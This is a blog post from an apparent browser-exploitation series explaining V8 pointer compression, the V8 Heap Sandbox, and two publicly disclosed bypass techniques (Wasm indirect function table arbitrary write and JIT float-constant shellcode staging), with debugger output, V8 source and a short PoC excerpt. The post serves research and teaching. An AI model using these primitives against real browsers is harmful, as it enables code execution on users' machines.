[Wipeload Step 2] Prison Break(EN)

thumbnail

In Wipeload Step 1, we kicked things off with a Renderer RCE via type confusion, chained it into a Chrome Sandbox Escape, and wrapped it all up with a Windows EoP. At the end of that post, I dropped a quick spoiler about what’s coming next—anyone happen to remember what it was?

If you’re not read the Wipeload Step 1 >>> here <<<

In Wipeload Step 2, before we get to chaining CVE-2023-3079 → CVE-2023-21674 → CVE-2023-29360 in later posts, we’re first going to do a quick refresher on type confusion—an absolute must-know when it comest to browser exploit analysis. We’ll also crack open the concepts behind the V8 Heap Sandbox added in 2024, along with its publicly disclosed bypass methods..!

In our very first chain, we used CVE-2019-5826 for the sandbox escape. Through this post, you’ll finally figure out the real difference between that traditional sandbox and the shiny new 2024 Heap Sandbox! 😎

1. Type Confusion Recap.

We already looked into Type Confusion in Chrome during our previous series and Wipeload Step 1, right?

To recap, optimizations happen during V8 compilation, and exploiting those very optimizations allow us to confuse types. Once a type confusion occurs, the object layout breaks from what’s expected. This lets us read and write memory containing pointer values as if it were just a double array, granting us Read/Write capabilities over address values. By finely crafting this primitive, we could manipulate Function Pointers or other Code Pointers to ultimately achieve RCE in the Renderer Process!

But because V8 was getting absolutely bombarded with these types of bugs, they eventually introduced the Heap Sandbox. 🥹

Now, I’ll pass the baton over to ji9umi to dive deeper into the V8 Heap Sandbox!!

2. V8 Heap Sandbox A-to-Z

Hey everyone! I’m ji9umi, and I’ll be taking the reins for the Renderer RCE stage in this second chain of the Wipeload project! 🌏 Honestly, diving into Chrome V8 exploit analysis wasn’t originally part of my plan at all (…) but somehow, I ended up joining the Wipeload project and have been spending some quality time getting up close and personal with V8.

stay.png

S..T..A..Y..

Alright, enough with the intro—let’s dive right in and break down the background and concepts behind the V8 Heap Sandbox!

2.1. The History of V8 Exploit

In-the-wild Chrome exploits found between 2021 and 2023—before the V8 Heap Sandbox was introduced—all had one thing in common: when memory corruption in the renderer process led to RCE, it executed with ‘Medium IL’ (standard application privileges).

About 60% of those cases happened in V8, Chrome’s JavaScript engine. The interesting part is that these vulnerabilities didn’t just happen directly. Even if the exploit eventually connected to memory corruption like UAF or OOB, the process relied on combining multiple internal logic issues inside V8.

A perfect example of this is type confusion, which you will always see if you study Chrome vulnerabilities. Beyond CVE-2018-17463 (which we covered in Wipeload Step 1), there is also CVE-2021-38003, which uses TheHole (a special object inside V8). Even if a bug didn’t lead to memory corruption directly, attackers could still manipulate memory through these middle steps.

Because there was a time gap between CVE-2018-17463 and CVE-2021-38003, there was a slight difference between the two. And that is Pointer Compression.

Around 2014, Chrome started switching from 32-bit to 64-bit processes. This brought benefits in security, stability, and performance, but pointers changed from 4 bytes to 8 bytes, which naturally required more memory space.

The solution to this was Pointer Compression. This method accesses objects in memory by using a base address and a 4-byte offset.

If you apply this within a 4GB-aligned memory space, all objects share the exact same base address. This means you can easily access any internal object using just a 32-bit offset.

                    |----- 32 bits -----|----- 32 bits -----|
Compressed pointer:                     |______offset_____w1|
Compressed Smi:                         |____int31_value___0|

However, not every value in V8 memory is stored within this 4GB region. Because of this, uncompressed pointers (raw pointers) still existed to access external objects. Solving this exact issue was one of the main goals behind creating the V8 Heap Sandbox.

2.2. Mechanism of V8 Heap Sandbox

The V8 Heap Sandbox is a new security mitigation introduced in March 2024, starting with Chrome version 123. In this post, we will revisit the concept of the V8 Heap Sandbox—which was briefly mentioned at the end of Chrome Exploit Part 4: Starting with Type Confusion 101 (published before the Wipeload project)—and analyze the methods used to bypass it from a technical perspective.

In the case of the two previously mentioned vulnerabilities, if memory corruption allowed arbitrary read/write access, there were no restrictions on the accessible memory area, making successful exploitation relatively smooth. The Heap Sandbox was introduced to block this, limiting access so that even if memory corruption occurs, attackers cannot access arbitrary memory addresses.

typical_chrome_exploit.png

Just a quick heads-up: the V8 Heap Sandbox and the Chrome Sandbox are two completely separate concepts, and we’ll be diving into the Chrome Sandbox in the upcoming Wipeload Step 4!

v8-heap-layout.png

The image above shows the V8 memory layout after the Heap Sandbox is applied. Since the deep technical details are already well-documented in the official docs, we’ll focus on understanding the overall architecture here.

  • V8 Heap Region

The V8 Heap Region occupies a 4GB space where compressed pointers are located, and it sits right at the starting point of the V8 Sandbox. In this region, objects are accessed using a 32-bit offset (excluding the base address). If access to an external object is needed, it references a pointer table instead.

  • V8 Sandbox

The V8 Sandbox is a large virtual address space allocated during the initialization process. As mentioned earlier, components like compressed pointers and the ArrayBuffer Backing Store live here. Objects that are inside the Sandbox but outside the V8 heap are accessed using a 40-bit offset—where the ‘V8 heap’ specifically refers to the 4GB region allocated from the very start of this space.

2.2. Exploit Development Side

From an exploit perspective, this updated memory layout required a completely different strategy. To manipulate arbitrary memory areas, an uncompressed raw pointer was necessary, but the Heap Sandbox strictly limited the controllable region. As a result, achieving Medium IL RCE now required an extra step compared to before.

At this point in time, as I study this topic, there are already several public bypass resources available. However, for this post, I walked through the process by referencing the technical analysis used to bypass CVE-2023-2033 and CVE-2023-3079.

3. Bypass Heap Sandbox

The second chain we’re covering in this Wipeload project was actually featured on Theori’s tech blog. They put together a great breakdown of the V8 Heap Sandbox as well, so I used their research as a foundation to move forward.

3.1. AAW and Code Execution with WasmIndirectFunctionTable Object

3.1.1. Patch Review

The first case bypasses the sandbox by obtaining a raw pointer and an RWX page address existing inside a WebAssembly (Wasm) object. This method is well-known for being used in both CVE-2023-2033 and CVE-2023-3079 exploits.

Wasm is a software interface designed to run high-performance applications on web pages, helping web applications leverage the execution speed advantages of executable files. The vulnerability used for this sandbox bypass went through two major rounds of patching.

  1. The First Patch (commit)
    1. Changed the allocation method to remove the raw pointer that existed inside WasmIndirectFunctionTable.
    2. PRIMITIVE_ACCESSORS()ACCESSORS()
  2. The Second Patch (commit)
    1. Since the first patch wasn’t a fundamental fix, a new method compatible with the sandbox environment was developed and applied.
    2. This introduced the ExternalPointerArray data type.

Based on these patch histories, we can infer that a field storing a raw pointer existed within WasmIndirectFunctionTable, a Wasm-related object. Before diving into the vulnerability itself, let’s take a quick look at what this object actually does.

3.1.2. Wasm Fundamentals

const tbl = new WebAssembly.Table({
    initial: 2,
    element: "anyfunc"
});
const importObject = {
    env: {
        jstimes3: (n) => 3 * n,
    },
    js: { tbl }
};
var code = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 10, 2, 96, 1, 127, 1, 127, 96, 0, 1, 127, 2, 27, 2, 3, 101, 110, 118, 8, 106, 115, 116, 105, 109, 101, 115, 51, 0, 0, 2, 106, 115, 3, 116, 98, 108, 1, 112, 0, 2, 3, 5, 4, 1, 1, 0, 0, 7, 16, 2, 6, 116, 105, 109, 101, 115, 50, 0, 3, 3, 112, 119, 110, 0, 4, 9, 8, 1, 0, 65, 0, 11, 2, 1, 2, 10, 24, 4, 4, 0, 65, 42, 11, 5, 0, 65, 211, 0, 11, 4, 0, 65, 16, 11, 6, 0, 65, 16, 16, 0, 11]);
var module = new WebAssembly.Module(code);
var instance = new WebAssembly.Instance(module, importObject);
var times2 = instance.exports.times2;

%DebugPrint(instance);

Wasm is mainly composed of a Module, an Instance, and a Table. A Module is the raw, uninitialized code, which turns into an Instance after going through an initialization process. An Instance can own multiple Tables, and in our example, we can see that tbl created inside importObject is passed along.

Within V8, an Instance is managed as a WasmInstanceObject, and its key fields are as follows:

  1. tables
    1. An array used to manage the list of received Tables. Since each Instance can contain multiple Tables, they are handled in an array format.
    2. A Table exists as a WasmTableObject.
  2. indirect_function_tables
    1. Functions created inside Wasm can be registered to the received Table.
    2. To differentiate these registered entries based on each Table, they are primarily managed within WasmIndirectFunctionTable.
    3. Following this, indirect_function_tables manages the overall information regarding these Tables.
  3. imported_function_targets
    1. Looking at the creation process of importObject, besides including tbl, it also declares jstimes3() internally.
    2. Elements passed through this mechanism are managed in the imported_function_targets field.

wasm-layout.png

The image above illustrates the reference relationships between the WasmTableObject, WasmInstanceObject, and WasmIndirectFunctionTable objects. Running the example code yields the following results:

$ ./d8 --allow-natives-syntax scripts/wasm.js --shell
DebugPrint: 0x194f0011b5e9: [WasmInstanceObject] in OldSpace  # [1] WasmInstanceObject
 - map: 0x194f00119919 <Map[224](HOLEY_ELEMENTS)> [FastProperties]
 - prototype: 0x194f001ca839 <Object map = 0x194f0011b5c1>
 - elements: 0x194f00000219 <FixedArray[0]> [HOLEY_ELEMENTS]
 - module_object: 0x194f001ccd3d <Module map = 0x194f001194dd>
 - exports_object: 0x194f001cce9d <Object map = 0x194f0011b875>
 - native_context: 0x194f00103c2d <NativeContext[282]>
 - tables: 0x194f001cce3d <FixedArray[1]>  # [2] tables
 - indirect_function_tables: 0x194f001cce49 <FixedArray[1]>  # [3] indirect_function_tables
 - imported_function_refs: 0x194f001ccdfd <FixedArray[1]>
 - indirect_function_table_refs: 0x194f001cce55 <FixedArray[2]>
 
# ...

 - imported_function_targets: 0x194f001ccded <ByteArray[8]>  # [4] imported_function_targets

# ...

DebugPrint: 0x194f001ccb01: [WasmTableObject]  # [5] WasmTableObject
 - map: 0x194f00119bb5 <Map[36](HOLEY_ELEMENTS)>
 - properties_or_hash: 0x194f00000219 <FixedArray[0]>
 - elements: 0x194f00000219 <FixedArray[0]>
 - instance: 0x194f00000251 <undefined>
 - entries: 0x194f001ccaf1 <FixedArray[2]>
 - current_length: 2
 - maximum_length: 0x194f00000251 <undefined>
 - dispatch_tables: 0x194f001cce8d <FixedArray[2]>  # [6] dispatch_tables
 - raw_type: 32000010

At [1] and [5], you can verify that the instance and tbl are created as a WasmInstanceObject and a WasmTableObject, respectively. Inside the WasmInstanceObject, the tables, indirect_function_tables, and imported_function_targets fields exist, while the WasmTableObject contains dispatch_tables.

You can manually verify this yourself by adding the --shell flag when running d8.

d8> %DebugPrintPtr(0x194f001cce3d);
DebugPrint: 0x194f001cce3d: [FixedArray]  # [1] tables of instance (0x194f0011b5e9)
 - map: 0x194f00000089 <Map(FIXED_ARRAY_TYPE)>
 - length: 1
           0: 0x194f001ccb01 <Table map = 0x194f00119bb5>  # [2] Same with tbl (0x194f001ccb01)

# ...

d8> %DebugPrintPtr(0x194f001cce8d);  # [3] dispatch_tables of tbl (0x194f001ccb01)
DebugPrint: 0x194f001cce8d: [FixedArray]
 - map: 0x194f00000089 <Map(FIXED_ARRAY_TYPE)>
 - length: 2
           0: 0x194f0011b5e9 <Instance map = 0x194f00119919>  # [4] Same with instance (0x194f0011b5e9)
           1: 0
# ...

In the initial code snippet, we couldn’t directly see the declarations for $f42 and $f83. To verify them yourself, converting the wasm code—which was originally declared as a Uint8Array—into a human-readable format yields the following text:

(module
  ;; The common type we use throughout the sample.
  (type $int2int (func (param i32) (result i32)))

  ;; Import a function named jstimes3 from the environment and call it
  ;; $jstimes3 here.
  (import "env" "jstimes3" (func $jstimes3 (type $int2int)))

  (import "js" "tbl" (table 2 funcref))
  (func $f42 (result i32) i32.const 42)  ;; [1] Define $f42 function
  (func $f83 (result i32) i32.const 83)  ;; [2] Define $f83 function
  (elem (i32.const 0) $f42 $f83)

  (func (export "times2") (type $int2int) (i32.const 16))
  (func (export "pwn") (type $int2int) (i32.const 16) (call $jstimes3))
)

Looking at points [1] and [2], you can see the declarations for both functions.

Since a full breakdown of the Wasm code will be covered at the very end of this post, feel free to refer to that section if you’d like to dive deeper into it! 🙏🏻

So, what exactly inside the WasmIndirectFunctionTable?

/* wasm/wasm-objects-inl.h */

// WasmIndirectFunctionTable
TQ_OBJECT_CONSTRUCTORS_IMPL(WasmIndirectFunctionTable)
PRIMITIVE_ACCESSORS(WasmIndirectFunctionTable, sig_ids, uint32_t*,
                    kSigIdsOffset)
PRIMITIVE_ACCESSORS(WasmIndirectFunctionTable, targets, Address*,    // [1]
                    kTargetsOffset)
OPTIONAL_ACCESSORS(WasmIndirectFunctionTable, managed_native_allocations,
                   Foreign, kManagedNativeAllocationsOffset)

Checking the contents at [1], we can see that the WasmIndirectFunctionTable object contains a targets field. As illustrated in the previous diagram, this field holds the address information for $f42 and $f83. Recall that in the first patch, the allocation method was changed from using PRIMITIVE_ACCESSORS to ACCESSORS.

d8> %DebugPrintPtr(0x325b001ccea9);
DebugPrint: 0x325b001ccea9: [WasmIndirectFunctionTable]
 - map: 0x325b00001599 <Map[32](WASM_INDIRECT_FUNCTION_TABLE_TYPE)>
 - size: 2
 - sig_ids: 0xa8d0a8550
 - targets: 0xa8d0a8560
 
 # ...
 
 (lldb) memory read -s8 -fx -c4 0xa8d0a8560
0xa8d0a8560: 0x000010a051b08000 0x000010a051b08004
0xa8d0a8570: 0x0000000a8cc50338 0x0000000a8cc50320

If you attach a debugger and inspect the value of the targets field yourself, you can see that a 64-bit address is stored there instead of a 32-bit offset. These addresses point to $f42 and $f83 in order, and further analysis yields the following details:

(lldb) memory read -s8 -fi 0x000010a051b08000
    0x10a051b08000: b      0x10a051b086a0
    0x10a051b08004: b      0x10a051b086ac
    0x10a051b08008: b      0x10a051b086b8
    0x10a051b0800c: b      0x10a051b086c4
    
(lldb) memory read -fi -c3 0x10a051b086a0
    0x10a051b086a0: mov    w8, #0x1 ; =1 
    0x10a051b086a4: b      0x10a051b08130
    0x10a051b086a8: nop

Since the pointers stored at 0xa8d0a8560 and 0xa8d0a8568 point to a table address used for branching, they have a 4-byte difference, and we can confirm that it actually follows the pointer one more time to reach the address targeted by the table.

3.1.3. Construct Primitive

Now that we understand what kind of values are stored in the targets field, we need to look into how we can actually leverage them. To set a value in this specific field, the WasmIndirectFunctionTable::Set() function is used, which is implemented as follows:

/* wasm/wasm-objects.cc */

void WasmIndirectFunctionTable::Set(uint32_t index, int sig_id,
                                    Address call_target, Object ref) {
  sig_ids()[index] = sig_id;
  targets()[index] = call_target;
  refs().set(index, ref);
}

Looking at the code, we can confirm that the call_target value passed as an argument is written to the memory location pointed to by targets. The core realization here was that if an attacker could manipulate this location, it would enable an arbitrary write primitive.

The next piece of information needed was to verify whether call_target is a value the attacker can control, and if so, what address it should be directed to point to. First of all, the WasmIndirectFunctionTable::Set() function is called inside WasmTableObject::Set(), which can be triggered via the JavaScript API WebAssembly.Table.prototype.set().

// https://github.com/theori-io/v8-sbx-bypass-wasm

  let arbitrary_write = (where, what) => {
    caged_write64(where_ptr, where - 0x8n);
    caged_write64(what_ptr, what);
    tbl.set(1, times2);
    caged_write64(what_ptr, rwx);
    caged_write64(where_ptr, targets);
  };
  
// ...

This corresponds to the tbl.set() call in the publicly available PoC example. The index passed as an argument was not an issue since it directly uses the value provided by the user. However, for call_target, the caller utilizes the return value of WasmInstanceObject::GetCallTarget().

Address WasmInstanceObject::GetCallTarget(uint32_t func_index) {
  wasm::NativeModule* native_module = module_object().native_module();
  if (func_index < native_module->num_imported_functions()) {
    return imported_function_targets().get(func_index);
  }
  return jump_table_start() +
         JumpTableOffset(native_module->module(), func_index);
}

Since the return value of this function was determined by func_index, it posed a significant constraint on specifying an arbitrary address. If func_index falls within the range of imported functions, the value is returned from imported_function_targets; otherwise, it returns an address calculated by adding an offset to jump_table_start().

imported_function_targets is a field that holds the locations of functions passed from the outside during instance creation. Debugging the pointers it references internally confirms that they point directly to an RWX memory region.

DebugPrint: 0x325b0011b5e9: [WasmInstanceObject] in OldSpace
 - map: 0x325b00119919 <Map[224](HOLEY_ELEMENTS)> [FastProperties]
 - prototype: 0x325b001ca87d <Object map = 0x325b0011b5c1>
 - elements: 0x325b00000219 <FixedArray[0]> [HOLEY_ELEMENTS]
# ...
 - imported_function_targets: 0x325b001cce31 <ByteArray[8]>    # <== imported_function_targets
 
(lldb) memory read -s8 -fx -c2 0x325b001cce31-1
0x325b001cce30: 0x000000100000095d 0x000010a051b086e0

(lldb) memory region 0x000010a051b086e0
[0x000010a051b08000-0x000010a051b0c000) rwx        # <== RWX page
Modified memory (dirty) page list provided, 0 entries.

Next, having confirmed how to obtain the RWX page address and the call_targets value, we examined the execution path required to reach the actual vulnerable logic.

The journey begins at WasmTableObject::Set(), which is the underlying implementation of WebAssembly.Table.prototype.set().

// wasm/wasm-objects.cc

// TODO(manoskouk): Does this need to be handlified?
void WasmTableObject::Set(Isolate* isolate, Handle<WasmTableObject> table,
                          uint32_t index, Handle<Object> entry) {
  // Callers need to perform bounds checks, type check, and error handling.
  DCHECK(IsInBounds(isolate, table, index));

  Handle<FixedArray> entries(table->entries(), isolate);
  // The FixedArray is addressed with int's.
  int entry_index = static_cast<int>(index);

  switch (table->type().heap_representation()) {
// ...
    default:
      DCHECK(!table->instance().IsUndefined());
      if (WasmInstanceObject::cast(table->instance())
              .module()
              ->has_signature(table->type().ref_index())) {
        SetFunctionTableEntry(isolate, table, entries, entry_index, entry); // <== here
        return;
      }
      entries->set(entry_index, *entry);
      return;
  }
}

Inside this function, a switch-case statement is used to route the execution to different processing functions based on the table’s type. Since the target function we want to reach requires passing through SetFunctionTableEntry(), it is processed under the default case, which does not match any of the predefined conditions.

// wasm/wasm-objects.cc

void WasmTableObject::SetFunctionTableEntry(Isolate* isolate,
                                            Handle<WasmTableObject> table,
                                            Handle<FixedArray> entries,
                                            int entry_index,
                                            Handle<Object> entry) {
// ...
  if (WasmExportedFunction::IsWasmExportedFunction(*external)) {  // Check is exported
    auto exported_function = Handle<WasmExportedFunction>::cast(external);
    Handle<WasmInstanceObject> target_instance(exported_function->instance(),
                                               isolate);
    int func_index = exported_function->function_index();
    auto* wasm_function = &target_instance->module()->functions[func_index];
    UpdateDispatchTables(isolate, *table, entry_index, wasm_function,
                         *target_instance);
  } else if (WasmJSFunction::IsWasmJSFunction(*external)) {
    UpdateDispatchTables(isolate, table, entry_index,
                         Handle<WasmJSFunction>::cast(external));
  } else {
    DCHECK(WasmCapiFunction::IsWasmCapiFunction(*external));
    UpdateDispatchTables(isolate, table, entry_index,
                         Handle<WasmCapiFunction>::cast(external));
  }
  entries->set(entry_index, *entry);
}

Inside the WasmTableObject::SetFunctionTableEntry() function, the behavior varies depending on the location of the target function. The vulnerable logic can be reached specifically when the function is ‘exported’. The other two cases, despite sharing the same function name, are handled by overloaded functions with different parameters, so careful attention is required.

// static
void WasmTableObject::UpdateDispatchTables(Isolate* isolate,
                                           WasmTableObject table,
                                           int entry_index,
                                           const wasm::WasmFunction* func,
                                           WasmInstanceObject target_instance) {
// ...

  Address call_target = target_instance.GetCallTarget(func->func_index);

  int original_sig_id = func->sig_index;

  for (int i = 0, len = dispatch_tables.length(); i < len;
       i += kDispatchTableNumElements) {
    int table_index =
        Smi::cast(dispatch_tables.get(i + kDispatchTableIndexOffset)).value();
    WasmInstanceObject instance = WasmInstanceObject::cast(
        dispatch_tables.get(i + kDispatchTableInstanceOffset));
    int sig_id = target_instance.module()
                     ->isorecursive_canonical_type_ids[original_sig_id];
    WasmIndirectFunctionTable ift = WasmIndirectFunctionTable::cast(
        instance.indirect_function_tables().get(table_index));
    ift.Set(entry_index, sig_id, call_target, call_ref);
  }
}

Once we reach the WasmTableObject::UpdateDispatchTables() function, we can finally observe the previously explained GetCallTarget() and WasmIndirectFunctionTable::Set() functions in action.

Reviewing the entire call stack clarifies that the function being passed must satisfy the ‘exported’ condition to proceed.

hmmm.jpg

Wait a minute, did you catch the anomaly here?

Looking at how call_targets values are determined, the location where the RWX page address is stored could be obtained from imported_function_targets. For this to happen, the func_index value naturally had to fall within the designated imported range.

However, to actually reach the vulnerable logic, the target function must be ‘exported’. Generally, it is impossible for an exported function to be assigned an index that falls within the imported range.

Although both imported_function_targets and jump_table_start reside within the V8 sandbox, the former uses compressed pointers while the latter uses raw pointers. At a stage where an arbitrary address write is not yet established, we cannot manipulate the address pointed to by jump_table_start. Therefore, we must leverage the controllable imported_function_targetsinstead.

To resolve this conflict, the referenced write-up used a method to forge the exported function’s index to 0. This was entirely possible because obtaining the function_index requires accessing the WasmExportedFunctionData object, which also resides inside the V8 sandbox.

Naturally, to utilize this method, at least one imported function must exist!

Consequently, the final exploit flow proceeds as follows:

  1. Create a Wasm Table and an Instance that imports it.
  2. Corrupt the targets of the WasmIndirectFunctionTable inside the WasmInstanceObject to an arbitrary address.
    1. This corrupted address becomes the ‘where’ in the AAW (Arbitrary Address Write) primitive.
  3. Forge the function_index of the exported function to 0.
  4. Modify the contents at the address pointed to by imported_function_targets to an arbitrary value.
    1. This modified value becomes the ‘what’ in the AAW primitive.
  5. Finally, invoke WebAssembly.Table.prototype.set().
    1. Through the internal logic, this writes ‘what’ into the ‘where’ location.

Once arbitrary address write is achieved, executing arbitrary code becomes possible as well.

Since the process above writes 8 bytes (corresponding to a pointer size) to an arbitrary address, you can write the desired shellcode into the RWX page 8 bytes at a time, and then call it to execute the injected shellcode.

3.1.4. Wasm Syntax

Before exploring the bypass method using JIT, let’s take a quick look at the Wasm syntax used in the exploit!

(module
  ;; The common type we use throughout the sample.
  (type $int2int (func (param i32) (result i32)))

  ;; Import a function named jstimes3 from the environment and call it
  ;; $jstimes3 here.
  (import "env" "jstimes3" (func $jstimes3 (type $int2int)))

  (import "js" "tbl" (table 2 funcref))
  (func $f42 (result i32) i32.const 42)
  (func $f83 (result i32) i32.const 83)
  (elem (i32.const 0) $f42 $f83)

  (func (export "times2") (type $int2int) (i32.const 16))
  (func (export "pwn") (type $int2int) (i32.const 16) (call $jstimes3))
)

First, looking at the beginning and the end, you can see that everything is enclosed within a single (module ...)structure. This is used for the purpose of declaring a Module.

Next follows (type $int2int (func (param i32) (result i32))), which declares a function signature. It creates a signature named $int2int that takes a 32-bit integer as an argument and returns a 32-bit integer. This is also used later as the type for the jstimes3 function.

(import "env" "jstimes3" (func $jstimes3 (type $int2int))) is the declaration process that allows a JavaScript function, passed during instance creation, to be used inside the Wasm environment.

const importObject = {
    env: {
        jstimes3: (n) => 3 * n,
    },
// ...

As a result, "env" "jstimes3" refers to the external name specified during the passing process, meaning that it will be invoked as $jstimes3 when called inside the Wasm environment.

The subsequent (import ...) statements, up to the (elem ...) part, work together as a single operation to declare $f42 and $f83and register them into the provided Table. For the table, the (table 2 funcref) segment means it is declared with a size of 2 and uses the funcref type to hold function references.

Other values belonging to Reference Types can also occupy this space besides funcref, which you can check out in the Wasm Types specification 🙃

Functions $f42 and $f83 are declared to return 32-bit integers of 42 and 83 upon invocation, respectively, and are registered to the Table via (elem (i32.const 0) $f42 $f83). Here, i32.const 0 specifies that the starting index begins at 0.

The final two lines handle declaring the export functions that can be invoked from JavaScript; as you can see, the pwnfunction calls the internal Wasm function $jstimes3.

3.2. Using JIT to Bypass Sandbox

3.2.1. JIT Fundamentals

As a second method for bypassing the V8 heap sandbox, there is an approach that leverages JIT. JIT, which stands for Just-In-Time, refers to a compilation technique that translates code into machine language at the exact moment the program executes. Since a method utilizing JIT for the CVE-2023-2033 exploit has also been publicly disclosed, I have briefly summarized it in this post.

const foo = () =>
{
  return [1.1, 2.2, 3.3];
}

foo();
%DebugPrint(foo);

The code above is a simple example that declares and executes a function named foo(), which returns a double array. Printing out the internal structure of the function object foo yields the following output:

DebugPrint: 0x6f1001cc631: [Function]
 - map: 0x06f1001043e5 <Map[28](HOLEY_ELEMENTS)> [FastProperties]
 - prototype: 0x06f100104299 <JSFunction (sfi = 0x6f1000cb201)>
 - elements: 0x06f100000219 <FixedArray[0]> [HOLEY_ELEMENTS]
 - function prototype: <no-prototype-slot>
 - shared_info: 0x06f10011acbd <SharedFunctionInfo foo>
 - name: 0x06f10011ac35 <String[3]: #foo>
 - builtin: InterpreterEntryTrampoline
 - formal_parameter_count: 0
 - kind: ArrowFunction
 - context: 0x06f10011ad8d <ScriptContext[3]>
 - code: 0x06f100267cb9 <Code BUILTIN InterpreterEntryTrampoline>  # [1]
 - interpreted
 - bytecode: 0x06f10011ae01 <BytecodeArray[5]>
 - source code: () =>
{
  return [1.1, 2.2, 3.3];
}
 
 # ...

Looking at [1], we can see that the code field exists. Checking the object pointed to by that address reveals the following structure:

d8> %DebugPrintPtr(0x06f100267cb9);
DebugPrint: 0x6f100267cb9: [Code] in ReadOnlySpace
 - map: 0x06f100000d9d <Map[60](CODE_TYPE)>
 - kind: BUILTIN
 - builtin: InterpreterEntryTrampoline
 - instruction_start: 0x157873680  # [1]
 - flags: 2
 
 # ...

Looking at position [1] in the printed output, we can identify the exact location where the actual instructions begin. Checking the memory at that address reveals the assembly code, along with the read and execute (RX) permissions granted for code execution.

(lldb) memory read -fi -c4 0x157873680
    0x157873680: ldur   w4, [x1, #0xb]
    0x157873684: add    x4, x28, x4
    0x157873688: ldur   w20, [x4, #0x3]
    0x15787368c: add    x20, x28, x20
    
(lldb) memory region 0x157873680
[0x0000000157840000-0x0000000157fd4000) r-x
Modified memory (dirty) page list provided, 0 entries.

If we can manipulate the code field to point to an arbitrary address when invoking a JavaScript function, it consequently means we can hijack the Program Counter (PC).

3.2.2. Exploit with JIT

Unlike Wasm JIT code, which is stored outside the V8 heap region, the JIT code for standard JavaScript functions is located inside the V8 heap. To verify this behavior, I modified the previous example as follows and executed it.

const foo = () =>
{
  return [1.1, 2.2, 3.3];
}

%PrepareFunctionForOptimization(foo);
foo();
%OptimizeFunctionOnNextCall(foo);
foo();
%DebugPrint(foo);

To confirm the changes that occur after optimization, I explicitly triggered it using native syntax.

DebugPrint: 0x1d04001cc681: [Function]
 - map: 0x1d04001043e5 <Map[28](HOLEY_ELEMENTS)> [FastProperties]
 - prototype: 0x1d0400104299 <JSFunction (sfi = 0x1d04000cb201)>
 - elements: 0x1d0400000219 <FixedArray[0]> [HOLEY_ELEMENTS]
 - function prototype: <no-prototype-slot>
 - shared_info: 0x1d040011ad11 <SharedFunctionInfo foo>
 - name: 0x1d040011ac35 <String[3]: #foo>
 - formal_parameter_count: 0
 - kind: ArrowFunction
 - context: 0x1d040011adf9 <ScriptContext[3]>
 - code: 0x1d040011af7d <Code TURBOFAN>  # [1]
 - source code: () =>
{
  return [1.1, 2.2, 3.3];
}

# ...

One of the differences from the initial execution is that the content indicated in [1] has changed from BUILTIN InterpreterEntryTrampoline to TURBOFAN.

d8>%DebugPrintPtr(0x1d040011af7d);
DebugPrint: 0x1d040011af7d: [Code] in OldSpace
 - map: 0x1d0400000d9d <Map[60](CODE_TYPE)>
 - kind: TURBOFAN
 - instruction_stream: 0x00015000800d <InstructionStream TURBOFAN>
 - instruction_start: 0x150008020
 - flags: 2147483869
0x15000800d: [InstructionStream]
 - map: 0x1d0400000a75 <Map(INSTRUCTION_STREAM_TYPE)>
 - code: 0x1d040011af7d <Code TURBOFAN>kind = TURBOFAN
stack_slots = 6
compiler = turbofan
address = 0x1d040011af7d

Instructions (size = 480)
0x150008020     0  10000010       adr x16, #+0x0 (addr 0x150008020)
0x150008024     4  eb02021f       cmp x16, x2
0x150008028     8  54000080       b.eq #+0x10 (addr 0x150008038)
0x15000802c     c  d2801001       movz x1, #0x80
0x150008030    10  f9678750       ldr x16, [x26, #20232]
0x150008034    14  d63f0200       blr x16

# ...

0x150008098    78  54000982       b.hs #+0x130 (addr 0x1500081c8)
0x15000809c    7c  91008043       add x3, x2, #0x20 (32)
0x1500080a0    80  f81c0343       stur x3, [x26, #-64]
0x1500080a4    84  91000442       add x2, x2, #0x1 (1)
0x1500080a8    88  d28121a4       movz x4, #0x90d
0x1500080ac    8c  b81ff044       stur w4, [x2, #-1]
0x1500080b0    90  d28000c4       movz x4, #0x6
0x1500080b4    94  b8003044       stur w4, [x2, #3]
0x1500080b8    98  d2933350       movz x16, #0x999a    # <== IEEE representations
0x1500080bc    9c  f2b33330       movk x16, #0x9999, lsl #16
0x1500080c0    a0  f2d33330       movk x16, #0x9999, lsl #32
0x1500080c4    a4  f2e7fe30       movk x16, #0x3ff1, lsl #48

Additionally, calling %DebugPrintPtr() dumped the entire code region at once, allowing us to verify the IEEE 754 representations used to output 1.1, 2.2, and 3.3. Since these values are stored in a readable and executable (RX) region, precisely manipulating these floating-point values makes it possible to stage shellcode directly into memory.

Consequently, hijacking the PC to point to this address allows for a successful bypass, as this region remains completely unaffected by the heap sandbox.

4. Takeaways

In Step 2 of our journey, we explored the core concepts of the V8 heap sandbox alongside two distinct methods to bypass it! Although this post did not directly cover the mechanics of memory corruption, both components are essential to building a functional Renderer exploit in practice.
In the upcoming Step 3, we will take a deep dive into CVE-2023-3079 and examine a full PoC that ties everything together, including the V8 heap sandbox bypass 🏋🏻‍♀️


99. References